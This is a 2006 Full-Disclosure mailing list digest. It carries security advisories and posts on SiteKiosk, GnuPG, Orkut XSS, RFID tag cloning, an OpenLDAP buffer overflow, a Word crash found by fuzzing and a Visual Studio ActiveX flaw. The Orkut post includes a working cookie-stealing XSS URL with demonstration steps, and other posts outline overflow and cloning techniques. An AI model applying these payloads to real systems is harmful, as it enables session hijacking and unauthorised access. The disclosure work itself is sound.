modified. The 'skinning' feature uses an HTML aware control for the modified title bar of the main SiteKiosk window. SiteKiosk displays the URL of the current location in the title bar of the main window, and therefore any HTML code in the location will be included in the title bar. By default, SiteKiosk does not properly handle the ABOUT: prefix. The URL is directly outputted to the screen leading to a normal cross site scripting vulnerability. Because the URL is also outputted to the title bar, script can be executed under the LOCAL computer zone. If a user types the following into the address box, or browses a site that sets the location to; ABOUT:helloclick here The title bar will display a hyperlink. By clicking on this HREF in the main windows title bar, the filesystem will be accessed with an explorer window. SiteKiosk also installs some activeX controls that are marked 'safe for scripting'. One of these controls exposes two dangerous methods that allow a SiteKiosk user to read and download any file from the kiosk with the permissions of the user running SiteKiosk. == Solutions == A new version of SiteKiosk has been released that addresses these vulnerabilities. It can be downloaded from http://www.sitekiosk.com. == Credit == Discovered and advised to SiteKiosk November 30, 2006 by Brett Moore of Security-Assessment.com == About Security-Assessment.com == Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. Security-Assessment.com is an Endorsed Commonwealth Government of Australia supplier and sits on the Australian Government Attorney-General's Department Critical Infrastructure Project panel. We are certified by both Visa and MasterCard under their Payment Card Industry Data Security Standard Programs. From security at mandriva.com Tue Dec 12 02:08:01 2006 From: security at mandriva.com (security at mandriva.com) Date: Mon, 11 Dec 2006 19:08:01 -0700 Subject: [Full-disclosure] [ MDKSA-2006:228 ] - Updated gnupg packages fix vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:228 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gnupg Date : December 11, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: A "stack overwrite" vulnerability in GnuPG (gpg) allows attackers to execute arbitrary code via crafted OpenPGP packets that cause GnuPG to dereference a function pointer from deallocated stack memory. Updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6235 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: 93c4722a375c1f5e6a05a005722c2611 2006.0/i586/gnupg-1.4.2.2-0.5.20060mdk.i586.rpm fffa84eb381e5c0db87f230b3c833239 2006.0/i586/gnupg2-1.9.16-4.4.20060mdk.i586.rpm e5ffb4d9fa64ef83afa9ea1faa287926 2006.0/SRPMS/gnupg-1.4.2.2-0.5.20060mdk.src.rpm ca942bbd6fcf9ebe78779737d40f14cd 2006.0/SRPMS/gnupg2-1.9.16-4.4.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 745e690087b6ccfc1ca328db1e6f4ebb 2006.0/x86_64/gnupg-1.4.2.2-0.5.20060mdk.x86_64.rpm 85cf60ed2063692019776138d718b233 2006.0/x86_64/gnupg2-1.9.16-4.4.20060mdk.x86_64.rpm e5ffb4d9fa64ef83afa9ea1faa287926 2006.0/SRPMS/gnupg-1.4.2.2-0.5.20060mdk.src.rpm ca942bbd6fcf9ebe78779737d40f14cd 2006.0/SRPMS/gnupg2-1.9.16-4.4.20060mdk.src.rpm Mandriva Linux 2007.0: a517dae5c83be0361406388c75098604 2007.0/i586/gnupg-1.4.5-1.2mdv2007.0.i586.rpm 76a286545f5e3122bb65dc812cb9660a 2007.0/i586/gnupg2-1.9.22-2.2mdv2007.0.i586.rpm b7c1585093289b0adaaf46939ec9f3f8 2007.0/SRPMS/gnupg-1.4.5-1.2mdv2007.0.src.rpm 4f2757b66ac4762ce46ded5329ec7246 2007.0/SRPMS/gnupg2-1.9.22-2.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 42c3c8f43d6ff4f67f93b5077b47a4ea 2007.0/x86_64/gnupg-1.4.5-1.2mdv2007.0.x86_64.rpm f9d3ecb8f0eb5b3721d7cd3a7beeff8a 2007.0/x86_64/gnupg2-1.9.22-2.2mdv2007.0.x86_64.rpm b7c1585093289b0adaaf46939ec9f3f8 2007.0/SRPMS/gnupg-1.4.5-1.2mdv2007.0.src.rpm 4f2757b66ac4762ce46ded5329ec7246 2007.0/SRPMS/gnupg2-1.9.22-2.2mdv2007.0.src.rpm Corporate 3.0: 7f7a5ddabcea09044efe1a242b4dee91 corporate/3.0/i586/gnupg-1.4.2.2-0.5.C30mdk.i586.rpm 15c09b82c8c273ec04ae71addf06d010 corporate/3.0/SRPMS/gnupg-1.4.2.2-0.5.C30mdk.src.rpm Corporate 3.0/X86_64: 0dccce30fd6713dfb228261e10fbb44c corporate/3.0/x86_64/gnupg-1.4.2.2-0.5.C30mdk.x86_64.rpm 15c09b82c8c273ec04ae71addf06d010 corporate/3.0/SRPMS/gnupg-1.4.2.2-0.5.C30mdk.src.rpm Corporate 4.0: 4908cbaf7474c988c82c2362bfacfa18 corporate/4.0/i586/gnupg-1.4.2.2-0.5.20060mlcs4.i586.rpm af02670a8a6446a77b8f09c807b7b44c corporate/4.0/i586/gnupg2-1.9.16-4.4.20060mlcs4.i586.rpm 6222c167396ffaec6afa98efca483241 corporate/4.0/SRPMS/gnupg-1.4.2.2-0.5.20060mlcs4.src.rpm 11bb29f2b1f7788f1b15c1f6e4503863 corporate/4.0/SRPMS/gnupg2-1.9.16-4.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: d5bafd16b9ad141f87e9259ae74e6538 corporate/4.0/x86_64/gnupg-1.4.2.2-0.5.20060mlcs4.x86_64.rpm 576f3921b0f631ede3da9d9efa541182 corporate/4.0/x86_64/gnupg2-1.9.16-4.4.20060mlcs4.x86_64.rpm 6222c167396ffaec6afa98efca483241 corporate/4.0/SRPMS/gnupg-1.4.2.2-0.5.20060mlcs4.src.rpm 11bb29f2b1f7788f1b15c1f6e4503863 corporate/4.0/SRPMS/gnupg2-1.9.16-4.4.20060mlcs4.src.rpm Multi Network Firewall 2.0: 58618fe995c74d079c66d5f56aeb8418 mnf/2.0/i586/gnupg-1.4.2.2-0.6.M20mdk.i586.rpm 10bf559c56d1ec0863905d65cc81eb02 mnf/2.0/SRPMS/gnupg-1.4.2.2-0.6.M20mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFfeF3mqjQ0CJFipgRAg8DAJ9TmZlzdEHqRx/TmNwfcAgMtcd9DwCfVNnm MlSJow6h1QNNTNWWIoBqVjk= =g7vl -----END PGP SIGNATURE----- From rajesh.sethumadhavan at yahoo.com Tue Dec 12 06:57:21 2006 From: rajesh.sethumadhavan at yahoo.com (Rajesh Sethumadhavan) Date: Mon, 11 Dec 2006 22:57:21 -0800 (PST) Subject: [Full-disclosure] Google's Orkut Group Cross Site Scripting Vulnerability Message-ID: <521121.1476.qm@web37207.mail.mud.yahoo.com> Orkut Group Cross Site Scripting Vulnerability ##################################################################### XDisclose Advisory : XD100098 Vulnerability Discovered: December 08th 2006 Advisory Released : Credit : Rajesh Sethumadhavan Class : Cross Site Scripting HTML Injection Severity : Medium Solution Status : Unpatched/Vendor notified Vendor : Google Inc Vendor Website : http://www.orkut.com Affected applications : Orkut Services Affected Platform : All ##################################################################### Overview: Orkut is an Internet social network service run by Google with more than 37 million total members and nearly 1.3 million daily visitors. It claims to be designed to help users meet new friends and maintain existing relationships with pictures and messages, and establish new ones by reaching out to people you've never met before. Orkut service is vulnerable to Cross-Site Scripting and HTML Injection. This is caused due to improper validation of user-supplied inputs. Description: A remote attacker can craft a GET request with the XSS payload as demonstrated below. When the victim access the mailcious URL payload will get executed which result in stealing of cookie, IP info, refer info, browser information, clipboard content, operating system info, hardware Info, modification of page or html injection, url redirection, port scanning of the network, and even phishing is possible. 1)Orkut Invite XSS: The flaws are due to improper sanitization of inputs passed to 'show' parameter in GET request ------------------------------------------------------------------- http://www.orkut.com/Friends.aspx?show=group1);alert(document.cookie ------------------------------------------------------------------ Demonstration: Note: Demonstration leads to your personal information disclosure - Login to your orkut account - Paste the above URL - Click on 'delete group' & 'ok' button - Orkut Cookies will get displayed The similar way HTML injection is also possible. Vulnerable Code: ------------------------------------------------------------------ < a href="javascript:handleDeleteGroup('', 1);alert(document.cookie);"> ------------------------------------------------------------------ Solution: Orkut can improve their filters by disallowing certain characters like " <>/\?&`~!@#$%^*()[]|;:"' " in user input URL. Screenshot: http://www.xdisclose.com/images/xdorkutgroupxss.jpg Impact: Successful exploitation allows execution of arbitrary script code in a user?s browser session in context of an affected site which result in stealing of cookie, IP info, refer info, browser information, clipboard content, operating system info, referrer info, hardware Info, modification of page or html injection (temporary webpage defacement), modification of page title, hijacking page flow, url redirection, port scanning of the victim?s network, and even phishing is possible. Impact of the vulnerability is network level. Original Advisory: http://www.xdisclose.com/XD100098.txt Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability Disclaimer: This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your own orkut account. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------- Cheap Talk? Check out Yahoo! Messenger's low PC-to-Phone call rates. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061211/563ce945/attachment.html From 3APA3A at SECURITY.NNOV.RU Mon Dec 11 16:43:31 2006 From: 3APA3A at SECURITY.NNOV.RU (3APA3A) Date: Mon, 11 Dec 2006 19:43:31 +0300 Subject: [Full-disclosure] Evasion Schemes or techniques In-Reply-To: References: Message-ID: <122491146.20061211194331@SECURITY.NNOV.RU> Dear Kassem Nasser, It's not clear, do you mean protection or protection evasion? --Sunday, December 10, 2006, 10:50:41 PM, you wrote to full-disclosure at lists.grok.org.uk: KN> Dear all, KN> I am interested in knowing evasion schemes for application based KN> intrusions available, -- ~/ZARAZA http://www.security.nnov.ru/ From zyro1001 at yahoo.com Mon Dec 11 23:25:18 2006 From: zyro1001 at yahoo.com (ZYRO) Date: Mon, 11 Dec 2006 15:25:18 -0800 (PST) Subject: [Full-disclosure] looking for security community input In-Reply-To: Message-ID: <589789.11094.qm@web51508.mail.yahoo.com> Hi, Its just an idea- But how about including "Cyber Defense & Counter Measures"? RZ --- Gadi Evron wrote: > Hi guys. > > This January a couple hundred people from the net-ops world, anti virus, > anti spam, law enforcement, etc. are getting together. > > I'd appreciate if any of you can send me input (off list, if not relevant > to generate discussion) on what the security community at large, rather > than just the security operations community, sees and is pre-occupied by. > > Specifically on subjects such as: > 1. Attacks. > 2. Law enforcement. > 3. DDoS. > 4. Botnets. > 5. Financial fraud. > 6. Spam. > 7. End users (bots?) > 8. Corporate espionage. > 9. Incident response > 10. Your topic here? > > And whats specifically you've had issues with and/or are looking for > solutions for or for what others are doing when it comes to security and > security related issues. Please note, this is about security operations > and Internet-wide threats which affect us all, more than local corporate > security issues. > > We will relay information back after the workshop, likely in early > February. > > To ask specific questions and/or direct us in specific directions, pick > and choose: > http://isotf.org/isoi2.html > > Thanks, > > Gadi. > > ZZZZZZ YYYY YYY RRRR OOOO ZZZ YYY YY R O O ZZZZZZZ YY R OOOO yy yy ____________________________________________________________________________________ Do you Yahoo!? Everyone is raving about the all-new Yahoo! Mail beta. http://new.mail.yahoo.com From ejes at torfree.net Mon Dec 11 22:22:28 2006 From: ejes at torfree.net (Evan Stawnyczy) Date: Mon, 11 Dec 2006 17:22:28 -0500 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture Message-ID: lol, I take it nobody has a sense of humor? It was suppose to be a joke. backfired? or just too lame... you decide :) -evan ($lastnamedisclosedinheaders$) ;) -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Matthew Flaschen Sent: Saturday, December 09, 2006 11:02 AM To: Andrew Farmer; full-disclosure Subject: Re: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture Andrew Farmer wrote: > On 08 Dec 06, at 12:47, Evan Stawnyczy wrote: > ^^^^^^^^^ >> My name is Evan ($LastNameNotDisclosed$). > > Nice job with the last-name-non-disclosure. Nice crack! ;) Matt From adam.laurie at thebunker.net Tue Dec 12 10:09:32 2006 From: adam.laurie at thebunker.net (Adam Laurie) Date: Tue, 12 Dec 2006 10:09:32 +0000 Subject: [Full-disclosure] RFID access control tokens widely open to cloning Message-ID: <457E7FDC.2020405@thebunker.net> Too many systems to itemize here rely on the 'unique ID' of an RFID token to grant access to a system or building, and, in the case that these tokens are based on 125kHz or 134.2kHz standard tags, many of them may be vulnerable to relatively simple cloning attacks. In a way this is nothing new - several researchers have previously presented attacks whereby RFID tags were emulated by custom built circuits which were able to fool readers into thinking that a genuine tag had been presented. However, the industry response was normally that this was not a 'real' threat, as it required specialist knowledge and equipment, and the resulting device was not a 'true clone' as it didn't have the same form factor as the original. The difference here is that the 'clone' may actually follow the same form factor as the original, and is therefore indistinguishable not just to the reader, but also to the human eye. In addition, no specialist equipment or custom circuitry is required, and the 'clones' can be produced using off the shelf equipment, software and blank tags purchased perfectly legally over the Internet. In fact, the tags are only doing what they were designed to do in the first place: implement industry standards. The problem is that many security system suppliers are integrating industry standard tag readers, and promoting the 'uniqueness' of the tag ID as a guaranteed certainty when it isn't, and thereby compromising the security of the entire system. The two specific tag types I've looked at are: Trovan 'Unique', aka EM4x02 FDX-B, aka EM4x05 - ISO-11784/5 (animal tags) The description of the 'Unique' tag, from the Trovan website is as follows: "The TROVAN UNIQUE? Read-Only System is well-suited to applications that require a high level of data security. Unlike other vendors'factory preprogrammed lines, the protocol of the TROVAN UNIQUE? line is patented, providing unmatched protection against unauthorised third-party cloning. Each transponder is programmed with a unique 10-digit ID code during manufacture. Comprehensive automatic test methods ensure that no code exists in duplicate in any of the TROVAN UNIQUE? transponder types, and that codes are programmed correctly in a readable manner. Once the code is programmed at the time of the transponder's manufacture, it cannot be counterfeited or tampered with. A total of 550 billion unique ID codes is available." Q5 are general purpose, multi-standard tags, that are capable of emulating other devices. I found that it was a standard feature of the Q5 chip to emulate a 'Unique' tag, and it was trivial to program a duplicate ID into one. The resulting tags were tested against three different systems that I have access to, and all three systems were unable to distinguish between the original and the 'clone'. In response to my questioning the security of the Unique tags, the response I got from Trovan was: "There are a variety of H4102 versions, some of which can be emulated by a Q5 tag. Our tags are a custom version of the H4100 tag.". It should be noted that I am not pointing the finger at Trovan devices here, but the 'Unique' standard some of their tags implement and which are generally available as a generic tag type - it is sometimes hard to tell exactly who's devices or tags are used in a specific installation, but suffice it to say that I have found 3rd party systems (one at a very recent security systems show in London) that were vulnerable to EM4x02 style cloning. The equipment required to do this was a laptop and off the shelf RFID reader/writer, but it could just as easily have been a small handheld, and so a credible threat exists of simply swiping an access tag ID in a 'walk-by' of someone leaving a building, and then producing a clone which will give full access. I am also able to produce what seem to be accurate clones of FDX-B tags (such as the one in my dog), and also VeriChip tags, in as much as a standard FDX-B reader such as you might find at your local vet will not be able to tell the difference. I have not been able to test if a genuine VeriGuard system would also be fooled, but VeriCorp's response when I took it up with them was: "You can take a write once and re-writeable chip and put the VeriGuard ID number on this chip, and a lot of readers will read the ID and including the VeriGuard reader. I can not tell you every but their three things that tell are unit that it is a VeriChip 16 digits not 15, timing and one other thing. We call it copying not cloning because the can't get all the information need to send to the VeriGuard reader at the right time."[sic] The latest release of the open source python library, RFIDIOt (v0.1h), contains tools for programming both EM4x02 and EM4x05 tag IDs to Q5 or Hitag2 tags, and I would suggest that if you own (or supply) systems based on either of these standards, that you use them to audit for this vulnerability. Full details here: http://rfidiot.org cheers, Adam -- Adam Laurie Tel: +44 (0) 1304 814800 The Bunker Secure Hosting Ltd. Fax: +44 (0) 1304 814899 Ash Radar Station http://www.thebunker.net Marshborough Road Sandwich mailto:adam at thebunker.net Kent CT13 0PL UNITED KINGDOM PGP key on keyservers From solareclipse at phreedom.org Tue Dec 12 09:42:47 2006 From: solareclipse at phreedom.org (Solar Eclipse) Date: Tue, 12 Dec 2006 01:42:47 -0800 Subject: [Full-disclosure] OpenLDAP kbind authentication buffer overflow Message-ID: <20061212094247.GA6126@dsl093-068-003.sfo1.dsl.speakeasy.net> There is a remotely exploitable buffer overflow in the Kerberos KBIND authentication code in the OpenLDAP slapd server. The vulnerability is in the krbv4_ldap_auth function in servers/slapd/kerberos.c. This function processes LDAP bind requests that specify the LDAP_AUTH_KRBV41 authentication method. The cred variable contains a pointer to the Kerberos authentication data sent by the client. The length of the data is not checked before it is copied into a fixed size buffer on the stack. Sending a bind request with more than 1250 bytes of credential data will result in a buffer overflow. The vulnerable code is given below: krbv4_ldap_auth(Backend *be, struct berval *cred, AUTH_DAT *ad) { KTEXT_ST k; KTEXT ktxt = &k; char instance[INST_SZ]; int err; Debug( LDAP_DEBUG_TRACE, "=> kerberosv4_ldap_auth\n", 0, 0, 0 ); AC_MEMCPY( ktxt->dat, cred->bv_val, cred->bv_len ); There should be a length check before the call to memcpy. The vulnerable code is enabled only when OpenLDAP is compiled with the --enable-kbind option, which has been disabled by default since version 2.0.2 and was removed from the configure script in the 2.1 release. The chance of finding a real system that is still vulnerable is minimal, however the code is still available in the latest 2.4.3 version of OpenLDAP and can be enabled manually as described in http://www.openldap.org/lists/openldap-software/200206/msg00371.html For more details and exploit code see http://www.phreedom.org/solar/exploits/openldap-kbind/ Solar Eclipse From pwicks at oxygen.com Tue Dec 12 15:44:51 2006 From: pwicks at oxygen.com (J. Patterson Wicks) Date: Tue, 12 Dec 2006 10:44:51 -0500 Subject: [Full-disclosure] Card Fraud In-Reply-To: <591fd0b20612110515j767241b0mcdc40d6f08b5b787@mail.gmail.com> Message-ID: <61FB25536BA8CC43A1AD4449F396B64901BC3516@O2MAIL.oxygen.corp> http://www.ftc.gov/bcp/conline/pubs/credit/cards.htm ________________________________ From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Stack Smasher Sent: Monday, December 11, 2006 8:15 AM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Card Fraud Who is the responsible organization in the US for card fraud? Thanks -- "If you see me laughing, you better have backups" -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061212/92f15755/attachment.html From joxeankoret at yahoo.es Tue Dec 12 18:44:38 2006 From: joxeankoret at yahoo.es (Joxean Koret) Date: Tue, 12 Dec 2006 19:44:38 +0100 Subject: [Full-disclosure] [fuzzing] OWASP Fuzzing page In-Reply-To: <2b87e78b0612120851u6b0d38das1b70c850e56ce45b@mail.gmail.com> References: <1efe3a6e0612110957y57697062i9c66599fd17e839d@mail.gmail.com> <2b87e78b0612111335k28717707m719d5ddffdb7950c@mail.gmail.com> <2b87e78b0612120519s2acc81a7v7c1aa2f48acfb67b@mail.gmail.com> <2b87e78b0612120851u6b0d38das1b70c850e56ce45b@mail.gmail.com> Message-ID: <1165949078.24129.7.camel@localhost.localdomain> Wow! That's fun! The so called "Word 0 day" flaw also affects OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool with the file: joxean at joxeankoret $ abiword 12122006-djtest.doc ** (AbiWord-2.2:24313): WARNING **: Invalid seek ** (AbiWord-2.2:24313): WARNING **: Invalid seek ** (AbiWord-2.2:24313): WARNING **: Invalid seek ** (AbiWord-2.2:24313): WARNING **: Invalid seek joxean at joxeankoret $ ooffice 12122006-djtest.doc OpenOffice.org lockfile found (/home/joxean/.openoffice/1.1.3/.lock) Using existing OpenOffice.org Application Errorsh: line 1: crash_report: command not found Application Error Fatal exception: Signal 6 Stack: /usr/lib/openoffice/program/libsal.so.3[0xb72e13ec] /usr/lib/openoffice/program/libsal.so.3[0xb72e1579] /usr/lib/openoffice/program/libsal.so.3[0xb72e1644] [0xffffe420] /lib/tls/libc.so.6(abort+0x1d2)[0xb6c2cfa2] /usr/lib/openoffice/program/libvcl645li.so[0xb7fadd3b] /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application5AbortERK6String+0x1f)[0xb7df3997] /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop9ExceptionEt +0x53)[0x8063029] /usr/lib/openoffice/program/libvcl645li.so(_ZN23ImplVCLExceptionHandler6signalEP13oslSignalInfo+0xb2)[0xb7df894e] /usr/lib/openoffice/program/libvos3gcc3.so(_ZN3vos28_cpp_OSignalHandler_FunctionEPvP13oslSignalInfo+0x18)[0xb750b2f6] /usr/lib/openoffice/program/libvos3gcc3.so(_Z24_OSignalHandler_FunctionPvP13oslSignalInfo+0x26)[0xb750b2d6] /usr/lib/openoffice/program/libsal.so.3[0xb72e1496] /usr/lib/openoffice/program/libsal.so.3[0xb72e1625] [0xffffe420] /lib/tls/libc.so.6(abort+0x1d2)[0xb6c2cfa2] /usr/lib/openoffice/program/libvcl645li.so[0xb7fadd3b] /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application5AbortERK6String+0x1f)[0xb7df3997] /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop9ExceptionEt +0x174)[0x806314a] /usr/lib/openoffice/program/libsfx645li.so(_Z18SfxNewHandler_Implv +0x60)[0xb3042e46] /usr/lib/openoffice/program/soffice.bin[0x80869cf] /usr/lib/openoffice/program/soffice.bin(_Znaj+0x2f)[0x8086b61] /usr/lib/openoffice/program/libsw645li.so[0xb1422b5e] /usr/lib/openoffice/program/libsw645li.so[0xb1422a69] /usr/lib/openoffice/program/libsw645li.so[0xb14243f2] /usr/lib/openoffice/program/libsw645li.so[0xb1425022] /usr/lib/openoffice/program/libsw645li.so[0xb14212df] /usr/lib/openoffice/program/libsw645li.so[0xb13e59c0] /usr/lib/openoffice/program/libsw645li.so[0xb13e7f7c] /usr/lib/openoffice/program/libsw645li.so[0xb13e813d] /usr/lib/openoffice/program/libsw645li.so[0xb12cc513] /usr/lib/openoffice/program/libsw645li.so[0xb147cc4e] /usr/lib/openoffice/program/libsfx645li.so(_ZN14SfxObjectShell6DoLoadEP9SfxMedium+0xa15)[0xb2eae69d] /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl4LoadEPK16SfxObjectFactory+0x563)[0xb2e2d1ef] /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl17LoadDataAvailableEv+0x1f3)[0xb2e2eb8d] /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl17LoadDataAvailableEv+0x39e)[0xb2e2ed38] /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl5StartEv+0x7ca)[0xb2e2c3ba] /usr/lib/openoffice/program/libsfx645li.so(_ZN19SfxFrameLoader_Impl4loadERKN3com3sun4star3uno8SequenceINS2_5beans13PropertyValueEEERKNS3_9ReferenceINS2_5frame6XFrameEEE+0x2361)[0xb2f10bb3] /usr/lib/openoffice/program/libfwk645li.so[0xb224207a] /usr/lib/openoffice/program/libfwk645li.so[0xb22485e4] /usr/lib/openoffice/program/libfwk645li.so[0xb223bb1c] /usr/lib/openoffice/program/libfwk645li.so[0xb225662c] /usr/lib/openoffice/program/soffice.bin(_ZN7desktop15DispatchWatcher23executeDispatchRequestsERKN4_STL6vectorINS0_15DispatchRequestENS1_9allocatorIS3_EEEE+0x230c)[0x807a34c] /usr/lib/openoffice/program/soffice.bin(_ZN7desktop15OfficeIPCThread22ExecuteCmdLineRequestsERNS_23ProcessDocumentsRequestE+0x17f)[0x807138d] /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop11OpenClientsEv+0x1ef6)[0x80681d4] /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop16OpenClients_ImplEPv+0x11)[0x8065ee7] /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop24LinkStubOpenClients_ImplEPvS1_+0x18)[0x8065ed2] /usr/lib/openoffice/program/libvcl645li.so[0xb7f49674] /usr/lib/openoffice/program/libvcl645li.so(_Z19ImplWindowFrameProcPvP8SalFrametPKv+0x44e)[0xb7f49fc2] /usr/lib/openoffice/program/libvclplug_gen645li.so(_ZN10SalDisplay21DispatchInternalEventEv+0xd9)[0xb618ad45] /usr/lib/openoffice/program/libvclplug_gen645li.so(_ZN13SalX11Display5YieldEh+0x28)[0xb618ad80] /usr/lib/openoffice/program/libvclplug_gen645li.so[0xb6186b28] /usr/lib/openoffice/program/libvclplug_gen645li.so(_ZN7SalXLib5YieldEh +0x1d3)[0xb61855db] /usr/lib/openoffice/program/libvclplug_gen645li.so(_ZN14X11SalInstance5YieldEh+0x31)[0xb618e49b] /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application5YieldEv +0x64)[0xb7df3baa] /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application7ExecuteEv +0x35)[0xb7df3ab7] /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop4MainEv +0x1f56)[0x8065446] /usr/lib/openoffice/program/libvcl645li.so(_Z6SVMainv+0x4a)[0xb7df89bc] /usr/lib/openoffice/program/libvcl645li.so(main+0x4c)[0xb7fade6c] /lib/tls/libc.so.6(__libc_start_main+0xf4)[0xb6c18974] /usr/lib/openoffice/program/soffice.bin(_ZN6Window11RequestHelpERK9HelpEvent+0x31)[0x805e161] Aborted I'm using OpenOffice.org 1.1.3 (Distributed with Debian Sarge 3.1). I will play a little with the POC to view if it affects OOffice in a way that code execution is possible. --- Joxean Koret > for something a little more technical > > This is an email I sent someone else. (sorry mate, ill give a few > other ones for the 'project' :) ) > > I do not know of any fuzzer that would find this. I do not know of > any fuzzing method, except the one I use that would find this. > > ===== > The file I have attached is a very basic two stage bug. stage 1 (the > first mod) forces the code down a wrong path. the second mod by > itsself is harmless, however when used with the first it will be the > first and part of the second overwrite. > > I have use 41414141 as a marker to make it easier for you to see. > > I have made it crash the wordviewer again to make it more obvious > > Weight, > location: 00000274 > value : 00000022 - just so it crashes, values 00000001 -> 00000006 > are probably the most useful for trying to overwrite a pointer. notice > that neighbouring areas can be weighted the same. > > marker, > location: 000027e4 > value : 41414141 > > the weight destination address == ((weight * 4[this is EDI]) + 4 > [ECX*4]) + source memory offest[ESI]. > > [also the meta data is microsofts, not mine] > ====== > > bug hugs, > > disco. > _______________________________________________ > fuzzing mailing list > fuzzing at whitestar.linuxbox.org > http://www.whitestar.linuxbox.org/mailman/listinfo/fuzzing -- ----------------------------------- Agian, agian, eg?n batez jeikiko dira egiazko Ziberotarrak, egiazko e?skald?nak, tirano arrotzen hiltzeko eta gure aiten aitek ?tzi daikien lurraren pop?liari erremetitzeko. ----------------------------------- -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada digitalmente Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061212/cc30b211/attachment.bin From zdi-disclosures at 3com.com Tue Dec 12 19:03:24 2006 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 12 Dec 2006 11:03:24 -0800 Subject: [Full-disclosure] ZDI-06-047: Microsoft Visual Studio WmiScriptUtils.dll Cross-Zone Scripting Vulnerability Message-ID: ZDI-06-047: Microsoft Visual Studio WmiScriptUtils.dll Cross-Zone Scripting Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-047.html December 12, 2006 -- CVE ID: CVE-2006-4704 -- Affected Vendor: Microsoft -- Affected Products: Visual Studio 2005 Standard Edition Visual Studio 2005 Professional Edition Visual Studio 2005 Team Suite Visual Studio 2005 Team Edition for Developers Visual Studio 2005 Team Edition for Architects Visual Studio 2005 Team Edition for Testers -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since November 6, 2006 by Digital Vaccine protection filter ID 4838. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Successful exploitation requires that the target user browse to a malicious web page. The specific flaw exists in the Microsoft WMIScriptUtils.WMIObjectBroker2 ActiveX control which is bundled with Visual Studio 2005. An attacker can utilize this control to bypass Internet zone security restrictions and instantiate other dangerous objects that can be leveraged to result in arbitrary code execution. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/Bulletin/MS06-073.mspx -- Disclosure Timeline: 2006.06.15 - Vulnerability reported to vendor 2006.11.06 - Digital Vaccine released to TippingPoint customers 2006.12.12 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion 